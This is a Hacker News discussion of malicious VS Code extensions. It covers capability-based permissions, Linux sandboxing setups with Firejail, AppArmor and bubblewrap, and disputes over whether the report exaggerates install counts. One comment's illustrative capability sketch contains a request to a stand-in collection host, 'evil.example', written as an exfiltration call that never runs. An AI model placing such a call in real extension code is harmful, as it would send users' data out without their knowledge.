Malicious VSCode extensions with more than 45k installs (checkpoint.com)
317 points by chha on May 22, 2023 | 186 comments



Capabilities-based security prevents these supply chain attacks! (Even though in this case most of the downloads were of packages including unwanted telemetry and not something more dangerous.)

“…And now if a [color theme] wants to read your data and send it to a server, it needs a filesystem capability and a network capability. It should be an obvious red flag if a [theming addon] were to ask for those dependencies. And this makes it hard to hide malware.” https://borretti.me/article/how-capabilities-work-austral

The original quote talks about a leftpad dependency but it’s a drop-in substitution to apply it here, too. It’s right there in the screenshot:

    const https = require('http')
    const os = require('os')
Both of those calls ought to error out with “Error: Network capability not provided” and “Error: filesystem capability not provided”, respectively.
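
To make it concrete, here is a rough sketch of what explicit capability passing could look like. makeThemeExtension and the caps object are made up for illustration, not any real Node or VS Code API:

    // Hypothetical capability-passing sketch; the host hands each extension
    // only the capabilities it declares, instead of ambient require().
    function makeThemeExtension(caps) {
      return {
        activate() {
          // A color theme is given neither caps.net nor caps.fs, so any
          // attempt to phone home fails loudly instead of silently working.
          if (!caps.net) throw new Error('Network capability not provided')
          caps.net.request('https://evil.example/collect') // never reached
        }
      }
    }

    const theme = makeThemeExtension({}) // host side: themes get an empty capability set
    theme.activate() // -> Error: Network capability not provided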


Yes! Sadly, today nobody seems to care about the principle of least privilege. Take Linux as an example: every program you install gets full access to the system and thousands of privileges it doesn't need. If your PDF reader is vulnerable, it will have both access to your SSH keys and to the Internet to upload them (and if you block Internet access for the PDF reader, it can still send the data by connecting to the systemd DNS resolver via D-Bus and exporting your keys as DNS requests).

Security is a joke in Linux in the default configuration.

> It should be an obvious red flag if a [theming addon] were to ask for those dependencies

No. Theming addons should not even be able to ask for those privileges.


> No. Theming addons should not even be able to ask for those privileges.

That's not the principle of least privilege, that's a user rule, and it isn't necessarily a good one.

I can imagine, for example, a theming add-on which queries a weather API and picks colors based on that, perhaps displaying a nice weather bar in the status line.

Such a theme would need to be granted this privilege, which should ideally be restricted to a host list, so that the user could pick another weather endpoint, but the theme can't promise weather and then deliver weather plus Google Analytics or your telemetry endpoint of choice.


Agree, although what would be really useful is if the capability listed exactly what data will be queried from VSCode and sent to the remote endpoint.


Something like a declared list of DNS domains the extension wants to access?


> Take Linux as an example: every program you install gets full access to the system...

... which should be locked down by group assignments and file-system permission flags. What the hell am I missing? The POSIX model has worked extraordinarily well for decades. The issue you're describing would be no different in Windows or any other operating system. If you install a malicious program, it can embed whatever protocols and communication channels it needs to exfiltrate any data your user account has access to. It's great to advocate for absolute least privilege in programs, but the only people who want to manage a matrix of permissions for every application on the system are IT managers who don't have to deal with the hassle or the complaints. This is precisely why so many things slip through on mobile. "Ain't nobody got time for that."


Do you execute your SSH agent as a different user/group from the one you use for your PDF reader? Does Firefox only get to read and write to ~/.config, ~/.cache and ~/Downloads?

The capabilities are there for the people who want to hot glue some elaborate contraptions together, but there is no good UX or DX for doing this in a composable manner for end user consumption.


The tools are there, if you care to use them.

A combination of very restrictive globals.local and <appname>.local files added to Firejail + custom AppArmor rules allows me to jail applications as well as or likely better than is possible on any other platform. Other tools are available that accomplish the same, if either or both of these is not to your liking (Firejail has improved greatly with recent versions, if your opinion was formed years ago, but not all default profiles have migrated from permissive explicit-deny policies to restrictive explicit-allow policies yet, and those old policies are a pita to add your own restrictions to).

You could also just live with the default rule sets Firejail and Apparmor ship with, and have less restrictively jailed apps by default, but in many cases sufficiently jailed to prevent access to e.g., your ssh-agent without any additional effort-- in this case jailing is just install firejail+apparmor and create a few symlinks for the applications you want to be jailed (IMO still not a high effort bar; and, there is a single command that will create symlinks for you, for everything firejail ships a default profile for, if you feel comfortable running that).

Nothing that interacts with the Internet or untrusted files has access to anything confidential in my home dir, or anywhere else on my system, unless that access is needed (including the named pipe for ssh-agent). Applications that don't need network access don't have it. Apps can only use syscalls that are explicitly listed, cannot gain capabilities beyond the restricted capabilities listed, only have access to the bins necessary to run, can only see the existence of processes in their own jail, etc.

If privileged filesystem or network access isn't required as a rule, I'll add a separate profile with extra privileges, and the default profile will not have that access. E.g., for pdf files, I have 'atril' and 'atril-privileged'. Neither atril profile has network access, nor access to ssh keys, the global ~/.cache, etc. The day-to-day one can only read from a few locations on the filesystem, and can only write to two paths. The privileged one can also read where I save private info like tax information.
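
For anyone curious, a minimal sketch of what such an override could look like in ~/.config/firejail/atril.local (paths are placeholders; check `man firejail-profile` for the directives your version supports):

    # ~/.config/firejail/atril.local: a sketch, paths are placeholders
    net none                             # no network access at all
    caps.drop all                        # drop every Linux capability
    seccomp                              # default syscall filter
    whitelist ${HOME}/Documents/reading  # only whitelisted paths exist in the jail;
    whitelist ${HOME}/.config/atril      # the rest of $HOME (ssh keys etc.) is hidden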

Firefox profiles run entirely in tmpfs, with each profile having its own ~/.cache and ~/Downloads (the real ~/Downloads contains symlinks to each of the jailed Download dirs), etc. I set up the tmpfs for Firefox and Chromium with a wrapper script, so I can easily handle data that I want to persist and work around limitations in Firejail. There are separate launchers (rarely used) for Firefox/Chromium which allow persistently modifying the profiles (most Firefox config is via user.js and misc sqlite/json files, but I'm unaware of an equivalent for Chromium).

DBUS is a pita for jails, though. To prevent escaping your private mount namespace jail, you really have to kill dbus access inside the jail (which requires a private net namespace or disallowing unix domain sockets to be really sure; but sometimes all you can do is add a filter-- Firejail allows for all of these options [with limitations on net namespace support for unpriv users] ).

Another addition to my setup that made the above restrictions more or less transparent is a script that runs as a daemon outside the jails and gets fed filenames and URLs from a helper script that runs inside each jail, symlinked as e.g. 'atril' for launching a pdf viewer from within a jail. The outer daemon script will launch a new jail instance of atril with the file passed by the helper script inside, e.g., the thunderbird jail. For URLs, the same jail instance of Firefox is re-used.


Indeed, SELinux and AppArmor are the tools here. I had a lot of trouble with them when they first came out, and just left them out of the loop. I had forgotten about them since moving to Macs about 8 years ago.


I used SELinux and AppArmor at work, and AppArmor for my own stuff. I found SELinux to be pretty unpleasant, but AppArmor rulesets / overrides not so bad. Definitely agree that there is a lot of room for improvement[1], but the tools exist, and a person who cares enough can jail apps at least as securely as on any other platform.

[1] Other warts are not having syscall groups like OpenBSD's pledge, so you have to track down new syscalls in each new kernel version to restrict them using deny policies (which are more flexible than explicit allow policies). And Linux capabilities are a mess that really deserves a do-over. You can get root with any of, at least, 6 capabilities. And so much stuff is crammed into CAP_SYS_ADMIN and CAP_NET_ADMIN that you effectively lose any granularity in selectively allowing privileged activities.


Cool, where can regular users get a setup like this that just works?


Nowhere?

You can get weaker jails, that are more likely to get in your way, on Linux and other platforms that "just work-ish" though [1].

Default jails on Linux with Firejail really are just: install the application and run a single command to jail everything it knows about. Or just create symlinks manually to be more selective. Not a high bar.

Having the ability to customize means not having to change the way I do things to conform to the whims of some random company. Jails that "just work", but do not allow customization are jailing the user too.

[1] You will need to adjust the way you work to the way the jails are set up by default. Some things you may want to do will not work at all, or not in the way you want them to. Many things will not be as extensively jailed as you might like. Applies to any of Android, iOS, Firejail, etc., using defaults.


> Do you execute your SSH agent as a different user/group from the one you use for your PDF reader?

Yes, if it's executed from a script.

> Does Firefox only get to read and write to ~/.config, ~/.cache and ~/Downloads?

I hear people don't like snaps. https://snapcraft.io/docs/home-interface


The MacOS app store has some sandboxing. For example, applications installed from the store can't access any file or directory unless a user has selected it in a file dialog. (The app can hold onto a ticket for later access.) I've installed Slack from the app store for this reason.


I've installed Slack on macOS using Nix. That way, the installer's sha256 is checked, and its attempts at self-modification (updating) are thwarted by /nix/store being a read-only filesystem.


I think MacOS has some protection even for manually installed apps. I downloaded iTerm2 as a .pkg and installed it manually into Applications, but the first time I typed `cd Downloads` I got an OS-level popup asking if I wanted to grant iTerm2 access to my downloads folder.


Linux has a fundamental security problem - it basically tries to protect the system from the user, not the user from themselves (i.e. from the user's own apps).

So it's difficult to modify a Linux system binary, but it's extremely easy to delete or exfiltrate a user file.

This security model might have made sense in the past, but today it's totally outdated since almost all systems, both local and in the cloud, have a single user which is the owner (has sudo).


Users were important in the past as well :)


> every program you install gets full access to the system

It gets your user's privileges when you run it. It's up to you how you run your programs.

Also there's no "default Linux configuration". There are many distributions, and they have different defaults and approaches.


Many distros with many approaches, yet not a single one with the convenient security feature that comment mentions.

So it's not "up to me" if the good choice is not practical


Yeah, it's too hard to just `useradd -m name` a new user, maybe set default acl once via setfacl -m d:u:main-user:rwx /home/name for easier file sharing with the main desktop user account, and `sudo su - name` to it, and run whatever less trusted apps need to run under that user account from then on, mostly isolated from the rest of the [file]system.

Distros clearly don't allow this and none has this feature or these commands preinstalled by default, nor are they built to be multi-user OSes. :D
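
Spelled out, for the record (a sketch; "sandboxed" and "me" are placeholder user names):

    sudo useradd -m sandboxed                    # throwaway account for less trusted apps
    sudo setfacl -m d:u:me:rwx /home/sandboxed   # default ACL so the main user can reach its files
    sudo su - sandboxed                          # switch to it...
    firefox                                      # ...and run the untrusted app under that uid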


Fedora (and I think all the RHEL family) comes with SELinux by default. Although I'm not that familiar with it (I tend to disable it more often than not), it seems to me like it's addressing precisely that.


It can't address that when it's disabled, and since it's not a good tool for addressing the issue, it stays disabled.


selinux isn't used in any meaningful way for desktop software.

The actual solution in that space is Flatpak.


my user's privileges contain my ssh keys, my passwords database, my personal files, ...


But that's your choice. I have multiple "users", and only one of them has access to ssh keys, etc. Users I use for less trusted apps just have write access to their mostly empty home dir filled with some dotfiles "whatever" app created by itself.

You can firewall by process UIDs/GIDs too, and I use that to allow the user access only to the internet and not to localhost or home network, or only to localhost, etc.
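
A sketch of that UID-based firewalling with iptables' owner match ("sandboxed" is a placeholder user; nftables has the equivalent "meta skuid"):

    # the owner match only applies to locally generated (OUTPUT) traffic
    iptables -A OUTPUT -m owner --uid-owner sandboxed -d 127.0.0.0/8    -j REJECT  # no localhost
    iptables -A OUTPUT -m owner --uid-owner sandboxed -d 192.168.0.0/16 -j REJECT  # no home LAN
    iptables -A OUTPUT -m owner --uid-owner sandboxed -j ACCEPT                    # internet is fine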


> Sadly, today nobody seem to care about the principle of least privileges.

People care.

But not enough to go through AppArmor/SELinux hell.

It's a lot of work.


At least there are practiced, hardened, and battle-tested tools that are relatively straightforward to use in Linux-land, like AppArmor.

macOS has also recently started investing more into securing the desktops of developers.

Windows seems shit out of luck in that regard.


I'm not sure whether it does what you want, but Windows has "Windows Sandbox":

https://learn.microsoft.com/en-us/windows/security/threat-pr...


Question: do snaps or similar tech in the distros help with this?


Yes Snap and Flatpak directly help solve this problem.


>is a joke

What did you expect? This is a computer to access and manipulate data, not to consume it like a smartphone.

Call me when a smartphone locked toyware can do 1% of what Emacs can do.

If anything, stop using proprietary crap to do your daily job.


If I am the one who decides what is locked (and not Google or Apple) then "smartphone" security model is good for me.


I want that feature too, but in reality, many non-trivial extensions require the execution of binaries such as language servers. Applying capability models to these executables will require OS support or containerization, but the overhead for memory and disk will be huge. In fact, even an extension to auto-complete paths in .gitignore files requires running a language server written in Rust [1], and it has the real benefit of supporting multiple editors with ease. If the "prettiest java" or "python-vscode" extensions in the article insisted on needing full permissions for Java or Python execution, I believe users would be convinced and end up installing them.

[1] https://github.com/quentinguidee/gitignore-ultimate-vscode


A language server for gitignore is not what I was expecting to come across this morning.

https://github.com/quentinguidee/gitignore-ultimate-server


> Applying capability models to these executables will require OS support or containerization, but the overhead for memory and disk will be huge.

This is because most OSes use an outdated security model where the app gets all privileges by default and poor users have to build containers to revoke them; that's why there is an overhead.

If the extension only has access to project files then all applications launched by it should inherit its restrictions.


This… is a very strong objection and I think you’re right that users would be convinced. I didn’t think capabilities would be a panacea but I did think they would be pretty close, I have to revise that down somewhat.


Couldn't you just run the language server in webassembly?


Yeah, android tried this initially with the permissions system. But literally every app requested every permission and it became completely useless.

As a user, you have no way of meaningfully using this info.


> android tried this initially with the permissions system. But literally every app requested every permission and it became completely useless.

Google could have fixed this by allowing the user to give the app mock permissions instead, e.g. empty or randomly-generated storage, fake camera device, randomly-generated contact list, etc. Third-party solutions that allow this have been around for about a decade, but they do not have the reach that Google does.


A counter-example where a permissions system mostly still works is Mac apps. They also have to request permissions for things like using the webcam, accessing important areas of the filesystem, reading keyboard input when they’re not the active program, and so on.

It might be illustrative that Apple, who usually care a lot about good UX, made this procedure downright painful. When the app is installed it’s fine, but when it tries to use a permissioned resource for the first time that pops up a dialog box. That box is not confirm/deny, but rather sends you to the System Settings window, where you have to find the right category, find the program in that category, select Allow, and then enter your password. It seems like Apple might think the Android permissions system failed in part because they made it too easy to say yes.


I'd say VSCode is a bit different in who it's aimed at. Just because this doesn't work for a consumer product doesn't mean it wouldn't work for VSCode.

Also it might be good to be more specific. E.g. don't ask for all permissions at once; instead, if the extension starts talking to telemetry.endpoint.com, it has to ask for that specific permission at that point.

Then the user can see, hey this is requesting access to this particular server, that seems fishy, let's not proceed.


Are VSCode users really that much more diligent? Are you auditing the source code for every extension you install? Do you even know if the GitHub source is the same as what's hosted on the plugins repo?

The only real solution I can see is only installing plugins from large trusted entities.


For sketchy extensions, download the vsix from the marketplace and extract it (it's just a zip), then inspect that and load it.
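
Something along these lines (the extension name is a placeholder, and the exact layout inside the archive can vary):

    # a .vsix is just a zip; unpack it and read the manifest and bundled JS first
    unzip some-extension.vsix -d some-extension      # "some-extension" is a placeholder
    less some-extension/extension/package.json       # entry point, activation events, publisher
    grep -R "http" some-extension/extension          # quick look for hardcoded endpoints
    # if it looks sane, install the local file you inspected
    code --install-extension ./some-extension.vsix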


> But literally every app requested every permission

They didn't. Google regrouped and renamed the permissions until every normal thing that every application needed became grouped with rare and powerful capabilities.

Except for the ad-based crapware, almost all applications minimize their permissions.


Users here are experienced developers, so I think it's not such a big deal. In context, a theme should never need network or file storage access, so you could upfront block those for that type of extension. You can also have policies like "network access is okay but file system and network access together needs approval".


Why are you assuming most VSCode users are "experienced developers"? I would think quite the contrary, as the younger crowd is probably much more likely to be using it than more experienced developers.


Fair enough. I think we can agree that the average VS code developer is more technically savvy than the average Android user?


I find I very quickly tire of having to think about this. You think "A theme shouldn't require file storage access" and then spend an hour looking up why it does and find out there is actually some strange but totally legitimate reason for it. And every time that happens, you lose a little bit of will to care about what permissions something requested.

There used to be a period where many android apps would explain in the description why they needed certain permissions. Those days are over.


> You think "A theme shouldn't require file storage access" and then spend an hour looking up why it does and find out there is actually some strange but totally legitimate reason for it

No. You think it is suspicious and install another theme that doesn't request anything.


I regularly deny various permissions to various Android apps (camera permission, file access, ...) and they degrade gracefully and keep on working.


Android used to ask for all permissions upfront; you had no choice. You want the app? Too bad, it gets access to your contacts. Now apps have to ask when they need them, and they are working on making file permissions more granular as well.


If there were a permission dialog with boxes I would gladly check or uncheck them, because nowadays I need to write bash scripts, create separate users or build containers for every third-party app. Why doesn't the OS include the necessary tools?


Capabilities can improve the situation significantly, but we need to change how we build software too; e.g. ".env" files in the project space will still be vulnerable due to the confused deputy problem.


Packj [1] flags malicious/risky NPM/PyPI/RubyGems packages by carrying out static analysis and looking for capabilities/permissions (diff from runtime permission enforcement). Supporting VSCode/browser extensions is on our roadmap.

Disclaimer: I'm the lead developer.

1. https://github.com/ossillate-inc/packj


In the context of an editor, this can be bypassed by writing this kind of code to the project, which will be run when the developer runs the project, runs tests, or in some languages even when the project is compiled.

A theme probably doesn't need access to the project files, but many extensions do. This is much harder to solve than in e.g. Android.



No, the fundamental uselessness of Deno is that it only supports process based permissions (a fact I initially debated with them over 4 years ago now…). For performance reasons all extensions run in the same process, so that wouldn’t work here.


Actually, the malicious extension only had 250 downloads; the 45k-install extension was only sending telemetry. It's a very misleading title, collapsing two separate incidents into one for the sake of dramatization.

This article also highlighted that automated tools used by VS team are pretty good at catching most of similar issues.


Tracking your host name is not telemetry; it's definitely spyware.


Exactly. Typically, exfiltrating this kind of information is only the first step. Once enough high value targets are caught in this net, the actual malware is deployed.


Still, it's not nearly on the same level as exfiltrating secrets.


Article disingenuously wraps a couple extensions that seem to be “actually” malicious (secret stealing), with one that has a lot of installs and is “HN-malicious” (collects telemetry) for a striking headline.

That said, malicious code in VS Code extensions is a problem. I wonder if a GPT could be helpful here. The existing internal systems for detecting malicious code seem lacking.


"HN-malicious"

Hehe. We could probably come up with a dozen similar HN specific adjectives.


HN-incompatible: Any website that hijacks the scroll bar or the back button of the browser..


"HN-stupid"

Anything known to be wrong with 20/20 hindsight.


Lol. MS Notepad is HN-bloated.


I would argue that Notepad was one of the few apps that wasn't HN-bloated. Although, I kind of think I heard that they rewrote it, so it probably is now...


This is one of the reasons I am *very* hesitant with VS Code extensions and Jetbrains plugins. The absolute minimum is strictly enforced on all my machines. Ditto for project dependencies (NPM, PyPi, Gradle etc.)

However, the way things are going, news of these vulnerabilities / incidents will be used to push Codespaces (IDE in the cloud) on enterprises -- and many companies will fall for it.

I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/


I think if it's a large org you should treat engineer machines as threat vectors by default, PoLP and all that jazz.

Someone already posted here how they were able to use pip to hijack Google developer machines, because on their machines the default was to resolve to the public repo first (even for private packages). Google just closed/ignored the issue because this was the engineers' problem and the official build was set up to resolve correctly (this is my from-memory summary).


If you apply the principle of least privilege to developers then ideally you should have a whitelist of every software package that they need to use. What happens then when a productive developer, instead of developing from scratch, searches for a solution to some problem and discovers that there is already a module that may solve it? Do they go to some central committee to get approval to add it to the whitelist? What are their criteria? How long will it take them to approve it?

Suppose it takes a couple of days. Then the developer tries the module. Discovers immediately that the module doesn't solve the problem. That's two days wasted for nothing.

Suppose some module has dependencies on a huge list of other modules. How long will it take now?

I'm not saying PoLP isn't valid. But is it practical?


> Do they go to some central committee to get approval to add it to the whitelist? What are their criteria? How long will it take them to approve it?

Yes, depends on the org, depends on the org.

Introducing third party dependencies should not be a single person decision.


Oh, yeah. That's how I have to treat large orgs as a contractor. :) And trouble starts almost immediately, because they apply PoLP only to you...

First thing with a new client is usually some form of VPN access. Even with open protocols, it's challenging to secure VPN access. E.g. by default, running openvpn with a random config provided by a third party allows the third party to push any network setup they want remotely. There's no whitelist, etc. It takes quite a bit of effort to run openvpn as an unprivileged user and make it do all network setup via a trusted setuid helper tool that can do whitelisting of allowed network configurations.

And oftentimes VPN has to be some closed source garbage. Management daemons for these require high privileges and take remote commands on how to reconfigure the network and god knows what else. They also can't deal with any non-basic networking setup. The first such VPN solution I had to briefly deal with (before telling the client that we'll want something secure for both sides and it's going to be a fixed wireguard config), was some Linux binary blob that I checked in ghidra before running, and one of the first things it did was scan the system for USB devices, and it had other hidden (to the end user, probably not to the buyer) remote management functionality absolutely irrelevant to a VPN software.

Devs need to apply PoLP also to the clients. Otherwise it's quite easy to accidentally route networks of multiple different clients together via a dev's machine.


I use a VM for each client. I host it on my desktop and then when I need to work from a laptop I just SSH into the VM.

This way I never "forget to turn off the client VPN" and similar BS, and my client files don't get mixed up, etc.


That works for a client or two. I'm already at ~20 and there will eventually be hundreds. Managing all that via random VMs and VPN solutions (I've had some require some smartphone app, and one time codes + pins just to connect to VPN) would just be sheer craziness if everyone was allowed their own VPN solution and network setup.


>I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/

When could SEs be trusted?

We run so much 3rd party code that it would be insane to expect SEs to verify it.

The security industry is also heavy on bullshit.

Instead of performing reviews they run some "scanners" and fill checkboxes


My God, the list of npm dependencies some projects I've worked on had.

Endless.

Anyway, it could have been me. I don't inspect vim plugins before install, generally.

Security is hard. Even if you're an expert, it's a lot of work.


As a bare minimum security measure, when using plugins (all 9 of them), my Vim runs in a bubblewrap sandbox with only my project folder mounted as writable. Network and IPC access is completely disabled. It is secure enough to stop practically all non-targeted attacks.
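
Roughly like this (a sketch; the exact read-only binds depend on the distro layout):

    # read-only system dirs, the project dir writable, no network, no IPC
    bwrap --ro-bind /usr /usr --ro-bind /etc /etc \
          --symlink usr/bin /bin --symlink usr/lib /lib \
          --proc /proc --dev /dev --tmpfs /tmp \
          --bind "$PWD" "$PWD" --chdir "$PWD" \
          --unshare-net --unshare-ipc \
          vim .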

Generally I try to install plugins whose authors I know. And whenever I update them (once a year) I re-read the entire source code. Some small plugins I just integrate in vimrc directly.

I hate to say this but Vim isn't the most secure editor, considering features like modelines which some environments enable by default and an aggressive plugin installing culture.


So it's Emacs, but we want features and not to be locked in. Don't run proprietary crap, trust Elisp repos like ELPA and NonGNU, and you will be mostly safe.


Isn't MELPA just serving the latest git master of whatever it happens to be at the time package-refresh-contents was called? With MELPA stable likewise just serving the latest tag? That doesn't spell trust.


Using Emacs is not going to help you avoid supply chain attacks per se. What it might do, however, is give you unparalleled power to inspect your environment - calls and source. If you run untrusted code you are exposed, and that's that. Development tools should assume that you, a programmer, know what you are programming.

Emacs and lisp is focused on providing power, not security. These often do not go hand in hand.


> What it might do, however, is give you unparalleled power to inspect your environment [...]

The "read the source" argument. It doesn't scale. I don't have 17 lifetimes to study a single release of every bit of software I run.

I really do appreciate Emacs for the introspection capabilities, but it's not a solution to the trust chain issue.


It scales to "don't run untrusted code if you are concerned about security"


> don't run untrusted code

The entire point of this thread is how a chain of trust should be maintained. "Don't run untrusted code" is skipping from the question straight to a hypothetical world where an answer has already been established.

"How to live long" - "don't die".


MELPA is not ELPA.


I always give source code a glance, unless it's by a sufficiently prominent and reputable maintainer.


Do you check _their_ dependencies though? And do you check every file?


I don't check every file but I use very sophisticated proprietary heuristics such as "intuition" and "hunch" for how far to dig.

I use vim so dependencies are explicit. But when using npm packages at work I give dependencies a look before I look anywhere else. An unfamiliar dependency gets looked at. It's easier since the npm website allows inspecting code.

It's a very imperfect process.


Have you ever caught anything?


No, that would be a different story :) I ended up not using dozens of plugins and libs after a look at their dependencies and code, though.


Emacs has deps on libraries such as pdf-tools with mupdf and telega with tdlib, but these are installed from the OS repos so they are trusted.


Only a handful of Vim plugins have dependencies, and even then you need to install them explicitly.


> I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe.

Were they ever? It's a big set of folks, and while some of them were and are competent an even larger subset isn't.


To add salt to the wound, their machines often have more rights/access too, making the impact that much bigger.


There must be a huge market for "audited and validated" subsets of the major package managers. For a monthly fee you have access to a secure version where all dependencies are checked (manually, or automatically) for vulnerabilities and where no new packages, or versions, can be added without a human having eyes over them.

Throw in a credits or fees system where you can request, for a cost, that a non-audited package be added to the subset, but then it's available for everyone.


Sure, but the business model for the entity providing that sucks. Practically infinite amounts of possible exploits and extremely finite resources to detect them. Either that or you are back to where you started with a web of trust.


I agree that would be a tough business model. Even for a relatively small package set like VS Code plugins there must be many thousands of releases to check every year and the potential market of paying customers for the tool is limited. Maybe it could work if some of the tech giants sponsored it?

For the wider problem of depending on external packages and managers like pip or npm I don't see how anyone could realistically keep up with the scale of releases that would need to be checked. You would need far fewer packages from far fewer sources with far less frequent releases for this to be a viable strategy. That might be nicer for developers for other reasons as well but it's not the world we live in today.


> Maybe it could work if some of the tech giants sponsored it

it's not about them sponsoring it, that frames it wrong. They need to use it; they have security budgets in the tens of millions, and they will already be doing some auditing of their own. A vendor can provide that service to the wider market.


It could be a "risk assessment" service. For a given package it could run an automated web-of-trust check on it, together with an analysis of its past history of vulnerabilities and of its maintainers.

You can also add watchers to check who is allowed to publish new versions and see when that list changes.

Even without looking at the code you could gather a useful report.


All it takes is one tired/careless/unlucky dev or IT engineer to get their machine owned, at minimum resulting in an extensive and tiring incident response and forensic verification to confirm nothing else happened, bearing in mind that once the attackers get a foothold they'll try to blend in.


> I guess software engineers and technical experts cannot be trusted anymore to keep their machines safe. :-/

I think we never could in the first place? While we are more cautious than the average user, we might occasionally shoot ourselves in the foot. That's part of our job.

The extensions shown in this example would not have ended up on my machine, simply because of the red flags they come with.


Are we more cautious? We might not fall for the old scam of extension bars in the browser and approving spam notifications but I'm sure plenty of people would blindly follow a tutorial to run commands in the terminal and install dependencies to run code.

The most recent example was probably Win 11 replacing the taskbar and people recommending all kinds of anonymous software on GitHub. It's open source and works, so it must be alright.


Plenty of popular developer-friendly tools have installation instructions that involve sudo, curl and piping to sh. That says everything we need to know. But if it didn't then the way many developers will casually install packages from untrusted third parties when the installation scripts themselves could do almost anything says the rest.

In addition developer PCs often have more privileges than a typical office worker. That's legitimately useful for our work but also means compromising a developer machine is a bigger risk. We're a nightmare for any organisation that wants proper IT security.


This feature request has been sitting around since 2018:

https://github.com/microsoft/vscode/issues/52116

It advocates for treating VSCode extension permissioning like browser extension permissioning.

Of course, it's not a panacea, but it would be lovely to have.

I discovered it when I went searching for a way to disable network access for a particular extension. You can do it, sort of, for VSCode itself, but not for individual extensions.


2 out of the 3 examples do not have more than 45k installs. The one example that did "had a simple PII stealer code" but was actually just sending telemetry.

The point of the article is probably valid, but the article itself seems to be dishonest.


I noticed that too, right from the headline "Malicious Extensions with more than 45,000 Installs" with a screenshot showing "278 installs".

Exaggerate much?


Does the 45k installs mean for a specific extension or just that 45k installs in total of all extensions?


One of the extensions had 45213 installs, which is what the headline stated. But no matter how you count it, the rest of the extensions were far off 45k.


I read it as any extension with more than 45k installs.

If it's 45k total, that's a very small percentage of all installs.


Right, but the one with 45k installs wasn't malicious - sending os version telemetry isn't PII stealing


I work in this space and see these types of "hit articles" so often.

These "security researchers/products" aren't doing anything more than spreading FUD and trying to sell their own products. Most of the FUD they spread is so widely misunderstood and positioned as if X thousands of machines/developers were "affected". The reality is much different.

In the name of being a good security citizen, please just report these extensions so action can be taken and less copy cats occur. Stop writing about these non-events. The reality of each registry is that there will always be bad extensions/packages/etc. The stewards of each registry work very hard to keep them safe. These types of articles make their lives harder, not easier.


> The stewards of each registry work very hard to keep them safe.

What kinds of things do they do? Any idea how this slipped through? Do you know what the review process entails before a plugin is made available for download?


Many things...

They verify that submissions meet criteria.

They scan for known malicious code/vulnerabilities.

They work with security researchers to take appropriate action on reports.

They enforce CoC and ToS policy to any that abuse it.

They work with the community to address any unrest.

They continuously monitor for suspicious activity.

They respond to active security incidents.

They work across many security working groups to stay current on best practices, latest standards, newest initiatives.

As to your other questions, this isn't "slipping through". These registries act under a "trust but verify" model. It simply would not scale if they had to manually review all submissions akin to the app store(Zero trust). Most of these registries run on volunteers or small pizza teams.

Every single registry has similar challenges. PyPi just last weekend had to halt user sign-ups and uploads due to these abuses.


I'll take the opportunity to self plug: I've been working on a solution to help bridge this gap of having to blindly trust VSCode extensions, planning to eventually also release it as open source

You're welcome to sign up for early access at https://coderguard.io/

As I'm currently mainly looking for user feedback


Looks interesting, I used to work on the vscode team, lmk if there’s anything I might help with.


As I understand, VSCode extensions can run arbitrary shell commands and Microsoft didn't add any security measures (e.g. asking a user for confirmation). In this case it is only a matter of time, motivation and perseverance until all users who use extensions will get a back door.

Of course this applies not only to VS Code, but to any other software which allows installing third-party extensions, like browsers, Gimp, Inkscape, DAWs like Ableton Live, etc. Their developers do not care about security and do not take measures to protect against malicious extensions.


Why should we? Repos like ELPA, NonGNU and CPAN are trusted enough.


Indeed. Professional woodworking equipment can also cut you, but that's a risk we accept, as we know its makers care more about providing a tool that works and can be used responsibly by trained professionals. Yes, we could insist everyone only hands us straitjackets in padded rooms, but I'm not sure that'd be a good thing.


For over 20 years now, professional woodworkers have had SawStops, devices that literally use an explosive charge to ram a block of aluminum into the blade of a table saw when it detects that the blade is touching something that might be a human body part. These are $50+ devices that destroy themselves on use (and often destroy the $50+ blade they’re used on), they have a high false positive rate, and yet they’re still in heavy use and very popular with professional woodworkers. Table saws also have riving knives and sleds with clamps, both to prevent kickback. All of this on top of constantly educating woodworkers to be responsible and use push blocks instead of their hands, to boot. All of these safety features exist on table saws because we did educate woodworkers on how to be responsible, and we still saw that the average table saw will cause more than one injury in its lifetime. I’m actually really glad you brought up woodworking because table saws are a perfect example of how we saw “this is risky, be responsible” was inadequate.


I remember as a kid seeing the Tomorrow's World episode where the chap demonstrated it to probably Philippa Forrester and Peter Snow. It looked like magic. What a great idea.


Not something you’ll find in any professional cabinetry shop. But you’re welcome to use Notepad for all your coding.


But if saw stops are mandatory, how the heck am I supposed to cut hotdogs?


little snitch is the sawstop.

detecting and preventing exfil attempts in real time is the current sota.


There's some capabilities-based security talk going on here, but the current state of the art in JavaScript makes absolutely no sense to me. It's nonsensical on its face. Right now, you grant caps through Deno to the whole executable script--so dependencies left and right that don't need caps get them.

So, what's the point? It's literally worthless. It does nothing to stop capabilities abuse.

The same thing could have happened here with Visual Studio Code. Neither the language nor its popular runtimes are designed for this behavior.

As far as I know Node.js still doesn't have capabilities functionality, which doesn't matter, because Deno's is so broken that they're practically on the same footing.
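
For reference, this is the whole granularity Deno gives you today: the flags scope the entire process, so every transitive dependency inherits them (example.com is a placeholder):

    # one set of process-wide grants; every module in the dependency graph gets them,
    # not just the one that needs them
    deno run --allow-read=. --allow-net=api.example.com main.ts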


The “right answer” afaik is to adopt the web permission model, which VSCode actually already supports. In addition to the Node extension host, there’s a WebWorker extension host which is much more secure (it’s the only host available on things like vscode.dev). Extensions need to opt into it unfortunately, but the code changes are not too bad in my experience.


I agree, but it's not a problem unique to javascript. I'm not aware of any popular language/runtime/package manager that goes beyond what Deno can do, however insufficient that is. It's quite a hard problem.


It’s a problem with security across computing in general, not just JS. For example, what are these languages and runtimes you have in mind that solve this issue with app plugins if VS Code were using them instead?


In other languages, it's possible to set up environments where code run from that environment has restricted access to explicitly defined globals.

You can do this to create things like plugin systems, etc, where you know by specification you never want a context to have access to say, making HTTP requests.


Out of curiosity, which languages?


Lua comes to mind first, with `setfenv`; other languages have similar functionality. I believe this can be done with C#, too.


I wonder how this would look elsewhere as things like WASM for extensions become more popular. How would you model capabilities in Rust? How would that not apply to the whole resulting binary?


If Darcula Dark's telemetry is malicious, VSCode itself is also malicious XDDDDD


> These continued findings highlight the need to verify every open-source component, not just assume it will be ok. We have included details regarding our specific findings below.

So, how do they suggest we do this with extensions for Visual Studio Code? The editor, as far as I know, doesn't contain any utilities for inspecting the actual source code of a plugin before installing it; instead you would have to use some 3rd party thing for downloading the zip file, then manually inspect the contents, before manually installing from the zip archive.

